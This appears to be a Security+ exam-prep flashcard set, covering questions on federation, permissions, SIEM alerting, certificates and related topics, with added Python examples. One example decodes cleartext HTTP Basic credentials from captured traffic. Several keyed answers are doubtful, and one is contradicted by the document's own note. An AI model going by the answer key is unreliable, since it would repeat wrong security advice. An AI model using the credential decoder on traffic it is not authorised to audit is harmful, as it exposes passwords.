Privilege escalation
A company offers SaaS, maintaining all customers’ credentials and authenticating locally. Many large
customers have requested the company offer some form of federation with their existing authentication
infrastructures. Which of the following would allow customers to manage authentication and authorizations from within their existing organizations?
Implement SAML so the company’s services may accept assertions from the customers’ authentication
servers.
Provide customers with a constrained interface to manage only their users’ accounts in the company’s
active directory server.
Provide a system for customers to replicate their users’ passwords from their authentication service to
the company’s.
Use SOAP calls to support authentication between the company’s product and the customers’
authentication servers.
Implement SAML so the company’s services may accept assertions from the customers’ authentication
servers.
An analyst receives an alert from the SIEM showing an IP address that does not belong to the assigned
network can be seen sending packets to the wrong gateway.
Which of the following network devices is misconfigured and which of the following should be done to remediate the issue?
Firewall; implement an ACL on the interface
Router; place the correct subnet on the interface
Switch; modify the access port to trunk port
Proxy; add the correct transparent interface
Router; place the correct subnet on the interface
Which of the following is used to encrypt web application data?
MD5
AES
SHA
DHA
AES (Advanced Encryption Standard)
A user from the financial aid office is having trouble interacting with the finaid directory on the university’s
ERP system. The systems administrator who took the call ran a command and received the following output:
Subsequently, the systems administrator has also confirmed the user is a member of the finaid group on the ERP system.
Which of the following is the MOST likely reason for the issue?
The permissions on the finaid directory should be drwxrwxrwx.
The problem is local to the user, and the user should reboot the machine.
The files on the finaid directory have become corrupted.
The finaid directory is not formatted correctly
The permissions on the finaid directory should be drwxrwxrwx.
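An added example (not part of the original flashcard set) of the check the systems administrator is doing by hand here. The page does not reproduce the command output, so the `ls -ld` line below is constructed; the user name `jdoe` and owner `erpadmin` are placeholders. The code applies the Unix rule that exactly one permission triple applies (owner, else group, else other) and reports which rights the caller is missing.

```python
# Constructed 'ls -ld finaid' output; the real output is not reproduced on the page.
SAMPLE_LS_LINE = "drwxr-x--- 2 erpadmin finaid 4096 Mar  4 09:12 finaid"


def parse_ls_line(line):
    """Pull mode, owner, group and name out of one 'ls -l' style line."""
    f = line.split()
    return {"mode": f[0], "owner": f[2], "group": f[3], "name": f[-1]}


def effective_perms(mode, owner, group, user, user_groups):
    """Unix evaluates the owner triple if you own the file, otherwise the group
    triple if you are in the group, otherwise 'other'. Only one triple ever applies,
    so an owner with an empty triple is locked out even if the group has rwx."""
    if user == owner:
        bits = mode[1:4]
    elif group in user_groups:
        bits = mode[4:7]
    else:
        bits = mode[7:10]
    return {
        "read": bits[0] == "r",
        "write": bits[1] == "w",
        # 's' (setuid/setgid) and 't' (sticky) in the last slot imply execute is set
        "execute": bits[2] in ("x", "s", "t"),
    }


def diagnose(line, user, user_groups):
    """Return the rights the user lacks on the directory. On a directory, 'execute'
    is search (needed to enter it) and 'write' is needed to create or delete files."""
    entry = parse_ls_line(line)
    perms = effective_perms(entry["mode"], entry["owner"], entry["group"], user, user_groups)
    return [right for right, granted in perms.items() if not granted]


if __name__ == "__main__":
    print(diagnose(SAMPLE_LS_LINE, "jdoe", ["finaid"]))  # ['write']
```

With the constructed mode the group member can list and enter `finaid` but not write to it. The least-privilege fix is `chmod 770` (group `finaid` gets rwx) rather than the world-writable `drwxrwxrwx` the card names, which would let every local account on the ERP host modify financial-aid records.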
A technician has been asked to document which services are running on each of a collection of 200 servers.
Which of the following tools BEST meets this need while minimizing the work required?
Nmap
Nslookup
Netcat
Netstat
Netstat
Joe, a member of the sales team, recently logged into the company servers after midnight local time to
download the daily lead form before his coworkers did. Management has asked the security team to provide a
method for detecting this type of behavior without impeding the access for sales employee as they travel
overseas.
Which of the following would be the BEST method to achieve this objective?
Configure time-of-day restrictions for the sales staff.
Install DLP software on the devices used by sales employees.
Implement a filter on the mail gateway that prevents the lead from being emailed.
Create an automated alert on the SIEM for anomalous sales team activity.
Create an automated alert on the SIEM for anomalous sales team activity
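An added example (not part of the original flashcard set) of the SIEM rule this card calls for. A time-of-day restriction would lock out a rep working normal hours in Tokyo, so the rule converts each login to the user's local time and only raises an alert; nothing is blocked. The login events and the per-user UTC offsets are constructed sample data, and the assumption that the offsets come from a travel or HR feed is labelled in the code.

```python
from datetime import datetime, timedelta, timezone

# Constructed SIEM login events: (UTC timestamp, user, country the session came from).
SAMPLE_LOGINS = [
    ("2024-03-04T14:05:00Z", "joe", "US"),     # 09:05 in joe's time zone: normal
    ("2024-03-05T05:30:00Z", "joe", "US"),     # 00:30 local: the after-midnight download
    ("2024-03-06T01:00:00Z", "maria", "JP"),   # 10:00 in Tokyo: normal while travelling
    ("2024-03-06T17:30:00Z", "maria", "JP"),   # 02:30 in Tokyo: off-hours
]

# Assumed per-user UTC offset (hours) for where they currently work; in practice this
# would be fed from the travel/HR system or the geolocation of recent sessions.
USER_UTC_OFFSET_HOURS = {"joe": -5, "maria": 9}

BUSINESS_HOURS = (6, 22)  # alert outside 06:00-22:00 local; tune per team


def local_time(utc_ts, offset_hours):
    """Convert an ISO-8601 UTC timestamp to the user's local wall-clock time."""
    utc = datetime.strptime(utc_ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return utc.astimezone(timezone(timedelta(hours=offset_hours)))


def off_hours_logins(events, offsets, hours=BUSINESS_HOURS):
    """Alert-only rule: flag logins outside the user's local business hours.
    Unknown users fall back to UTC (offset 0) rather than being ignored."""
    start, end = hours
    alerts = []
    for utc_ts, user, country in events:
        local = local_time(utc_ts, offsets.get(user, 0))
        if not (start <= local.hour < end):
            alerts.append({"user": user, "utc": utc_ts, "country": country,
                           "local": local.strftime("%Y-%m-%d %H:%M")})
    return alerts


if __name__ == "__main__":
    for alert in off_hours_logins(SAMPLE_LOGINS, USER_UTC_OFFSET_HOURS):
        print(alert)
```

Pair the time rule with a second signal (download volume of the lead form, or a login country that does not match the travel record) before paging anyone, or the rule will fire on every early riser.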
Which of the following methods is used by internal security teams to assess the security of internally
developed applications?
Active reconnaissance
Pivoting
White box testing
Persistence
White box testing
Two users must encrypt and transmit large amounts of data between them. Which of the following should they
use to encrypt and transmit the data?
Symmetric algorithm
Hash function
Digital signature
Obfuscation
Symmetric algorithm
Management wants to ensure any sensitive data on company-provided cell phones is isolated in a single
location that can be remotely wiped if the phone is lost. Which of the following technologies BEST meets this
need?
Geofencing
Containerization
Device encryption
Sandboxing
Containerization
While troubleshooting a client application connecting to the network, the security administrator notices the
following error: Certificate is not valid. Which of the following is the BEST way to check if the digital
certificate is valid?
PKI
CRL
CSR
IPSec
CRL
An organization wants to upgrade its enterprise-wide desktop computer solution. The organization currently
has 500 PCs active on the network. The Chief Information Security Officer (CISO) suggests that the
organization employ desktop imaging technology for such a large scale upgrade. Which of the following is a
security benefit of implementing an imaging solution?
It allows for faster deployment
It provides a consistent baseline
It reduces the number of vulnerabilities
It decreases the boot time
It provides a consistent baseline
A number of employees report that parts of an ERP application are not working. The systems administrator
reviews the following information from one of the employee workstations:
Execute permission denied: financemodule.dll
Execute permission denied: generalledger.dll
Which of the following should the administrator implement to BEST resolve this issue while minimizing risk and attack exposure?
Update the application blacklist
Verify the DLL’s file integrity
Whitelist the affected libraries
Place the affected employees in the local administrator’s group
Whitelist the affected libraries
Which of the following is a deployment concept that can be used to ensure only the required OS access is
exposed to software applications?
Staging environment
Sandboxing
Secure baseline
Trusted OS
Sandboxing
A security analyst is attempting to identify vulnerabilities in a customer’s web application without impacting the system or its data. Which of the following BEST describes the vulnerability scanning concept performed?
Aggressive scan
Passive scan
Non-credentialed scan
Compliance scan
Passive Scan
A forensic investigator has run into difficulty recovering usable files from a SAN drive. Which of the
following SAN features might have caused the problem?
Storage multipaths
Deduplication
iSCSI initiator encryption
Data snapshots
Deduplication
Hacktivists are most commonly motivated by:
curiosity
notoriety
financial gain
political cause
political cause
Which of the following can occur when a scanning tool cannot authenticate to a server and has to rely on
limited information obtained from service banners?
False positive
Passive reconnaissance
Access violation
Privilege escalation
False positive
An organization plans to implement multifactor authentication techniques within the enterprise network architecture. Each authentication factor is expected to be a unique control. Which of the following BEST describes the proper employment of multifactor authentication?
Proximity card, fingerprint scanner, PIN
Fingerprint scanner, voice recognition, proximity card
Smart card, user PKI certificate, privileged user certificate
Voice recognition, smart card, proximity card
Proximity card, fingerprint scanner, PIN
When considering IoT systems, which of the following represents the GREATEST ongoing risk after a
vulnerability has been discovered?
Difficult-to-update firmware
Tight integration to existing systems
IP address exhaustion
Not using industry standards
Difficult-to-update firmware
A bank is experiencing a DoS attack against an application designed to handle 500 IP-based sessions. In addition, the perimeter router can only handle 1Gbps of traffic. Which of the following should be implemented to prevent DoS attacks in the future?
Deploy multiple web servers and implement a load balancer
Increase the capacity of the perimeter router to 10 Gbps
Install a firewall at the network to prevent all attacks
Use redundancy across all network devices and services
Use redundancy across all network devices and services
A company is allowing a BYOD policy for its staff. Which of the following is a best practice that can decrease the risk of users jailbreaking mobile devices?
Install a corporately monitored mobile antivirus on the devices.
Prevent the installation of applications from a third-party application store.
Build a custom ROM that can prevent jailbreaking.
Require applications to be digitally signed.
Require applications to be digitally signed.
Upon entering an incorrect password, the logon screen displays a message informing the user that the
password does not match the username provided and is not the required length of 12 characters. Which of the following secure coding techniques should a security analyst address with the application developers to follow security best practices?
Input validation
Error handling
Obfuscation
Data exposure
Error handling
Due to regulatory requirements, servers in a global organization must use time synchronization. Which of the following represents the MOST secure method of time synchronization?
The server should connect to external Stratum 0 NTP servers for synchronization
The server should connect to internal Stratum 0 NTP servers for synchronization
The server should connect to external Stratum 1 NTP servers for synchronization
The server should connect to internal Stratum 1 NTP servers for synchronization
The server should connect to internal Stratum 0 NTP servers for synchronization
A company has critical systems that are hosted on an end-of-life OS. To maintain operations and mitigate
potential vulnerabilities, which of the following BEST accomplishes this objective?
Use application whitelisting.
Employ patch management.
Disable the default administrator account.
Implement full-disk encryption.
Use application whitelisting
A systems administrator is configuring a new network switch for TACACS+ management and authentication.
Which of the following must be configured to provide authentication between the switch and the TACACS+
server?
802.1X
SSH
Shared secret
SNMPv3
CHAP
Shared secret
A security engineer wants to add SSL to the public web server. Which of the following would be the FIRST
step to implement the SSL certificate?
Download the web certificate
Install the intermediate certificate
Generate a CSR
Encrypt the private key
Generate a CSR
During a lessons learned meeting regarding a previous incident, the security team receives a follow-up action item with the following requirements:
Allow authentication from within the United States anytime
Allow authentication if the user is accessing email or a shared file system
Do not allow authentication if the AV program is two days out of date
Do not allow authentication if the location of the device is in two specific countries
Given the requirements, which of the following mobile deployment authentication types is being utilized?
Geofencing authentication
Two-factor authentication
Context-aware authentication
Biometric authentication
Context-aware authentication
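An added example (not part of the original flashcard set) that turns the four requirements above into a small policy evaluator. The page does not name the two blocked countries, so `XX` and `YY` are placeholder codes, and the ordering is an assumption stated in the code: deny rules (stale AV, blocked location) are checked before the allow rules, so a US device with outdated AV is still refused. The request contexts in the test are constructed.

```python
from datetime import date

# Placeholder codes for the "two specific countries"; the page does not name them.
BLOCKED_COUNTRIES = frozenset({"XX", "YY"})
# Resources that may be reached from any non-blocked location.
ALWAYS_ALLOWED_RESOURCES = frozenset({"email", "fileshare"})
# "Two days out of date" is read as: signatures dated 2 or more days ago (assumption).
MAX_AV_AGE_DAYS = 2


def evaluate_auth(ctx, today_iso):
    """Decide an authentication attempt from device/session context.

    ctx keys: 'country' (ISO code of device location), 'resource' (what is being
    accessed), 'av_signature_date' (ISO date of the AV definitions on the device).
    Returns (decision, reason). Explicit deny rules win over allow rules (assumption).
    """
    today = date.fromisoformat(today_iso)
    av_age_days = (today - date.fromisoformat(ctx["av_signature_date"])).days

    # Deny rules first.
    if av_age_days >= MAX_AV_AGE_DAYS:
        return "deny", f"AV definitions {av_age_days} days out of date"
    if ctx["country"] in BLOCKED_COUNTRIES:
        return "deny", f"device located in blocked country {ctx['country']}"

    # Allow rules.
    if ctx["country"] == "US":
        return "allow", "device inside the United States"
    if ctx["resource"] in ALWAYS_ALLOWED_RESOURCES:
        return "allow", f"{ctx['resource']} is permitted from any non-blocked location"

    # Default deny: nothing matched.
    return "deny", "no allow rule matched"


if __name__ == "__main__":
    sample = {"country": "DE", "resource": "email", "av_signature_date": "2024-03-03"}
    print(evaluate_auth(sample, "2024-03-04"))  # ('allow', 'email is permitted ...')
```

The device attributes (location, AV state) have to come from a trusted agent or MDM attestation rather than from the client request itself, otherwise the deny rules are trivially bypassed by a device that lies about its country.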
A procedure differs from a policy in that it:
is a high-level statement regarding the company’s position on a topic.
sets a minimum expected baseline of behavior.
provides step-by-step instructions for performing a task.
describes adverse actions when violations occur.
Provides step-by-step instructions for performing a task
Which of the following is being used when a malicious actor searches various social media websites to find
information about a company’s system administrators and help desk staff?
Passive reconnaissance
Initial exploitation
Vulnerability scanning
Social engineering
Passive reconnaissance
A security analyst is performing a manual audit of captured data from a packet analyzer. The analyst looks for base64-encoded strings and applies the filter http.authbasic. Which of the following describes what the analyst is looking for?
Unauthorized software
Unencrypted credentials
SSL certificate issues
Authentication tokens
Unencrypted credentials
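An added example (not part of the original flashcard set) doing by script what the http.authbasic filter does in the analyzer: find `Authorization: Basic` headers in captured HTTP, base64-decode them and split out the user name and password, which is exactly why Basic auth over plain HTTP counts as unencrypted credentials. The request lines below are a constructed capture; the host name and credentials are invented.

```python
import base64
import re

# Constructed capture: HTTP request lines as a packet analyzer would show them.
SAMPLE_HTTP_LINES = [
    "GET /admin HTTP/1.1",
    "Host: intranet.example.internal",
    "Authorization: Basic YWxpY2U6UGFzc3cwcmQh",        # base64("alice:Passw0rd!")
    "",
    "GET /api/status HTTP/1.1",
    "Host: intranet.example.internal",
    "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.e30.abc",  # not Basic: ignored
    "",
    "POST /login HTTP/1.1",
    "Authorization: Basic bm90LWJhc2U2NA",              # decodes, but has no ':' separator
]

# Only the Basic scheme; the token is the base64 alphabet plus optional '=' padding.
BASIC_RE = re.compile(r"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)\s*$", re.IGNORECASE)


def extract_basic_credentials(lines):
    """Return one record per decodable 'user:password' Basic credential in the capture."""
    found = []
    for lineno, line in enumerate(lines, 1):
        m = BASIC_RE.match(line)
        if not m:
            continue
        token = m.group(1)
        # Some clients omit padding; restore it so strict decoding succeeds.
        padded = token + "=" * (-len(token) % 4)
        try:
            decoded = base64.b64decode(padded, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not real base64 text: skip rather than crash on junk
        if ":" not in decoded:
            continue  # RFC 7617 requires user-id ':' password
        user, _, password = decoded.partition(":")
        found.append({"line": lineno, "user": user, "password": password})
    return found


if __name__ == "__main__":
    for cred in extract_basic_credentials(SAMPLE_HTTP_LINES):
        print(f"line {cred['line']}: {cred['user']} / {cred['password']}")
```

The same header sent over HTTPS is protected in transit, so this check only matters on cleartext HTTP captures; seeing it there is a finding against the application, not just the network.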
A security administrator learns that PII, which was gathered by the organization, has been found in an open forum. As a result, several C-level executives found their identities were compromised, and they were victims of a recent whaling attack.
Which of the following would prevent these problems in the future? (Select TWO).
Implement a reverse proxy.
Implement an email DLP.
Implement a spam filter.
Implement a host-based firewall.
Implement a HIDS.
Implement an email DLP
and
Implement a spam filter
A company has two wireless networks utilizing captive portals. Some employees report getting a trust error in
their browsers when connecting to one of the networks. Both captive portals are using the same server certificate for authentication, but the analyst notices the following differences between the two certificate details:
Certificate 1
Certificate Path: Geotrust Global CA > *company.com
Certificate 2
Certificate Path: *company.com
Which of the following would resolve the problem?
Use a wildcard certificate.
Use certificate chaining.
Use a trust model.
Use an extended validation certificate.
Use certificate chaining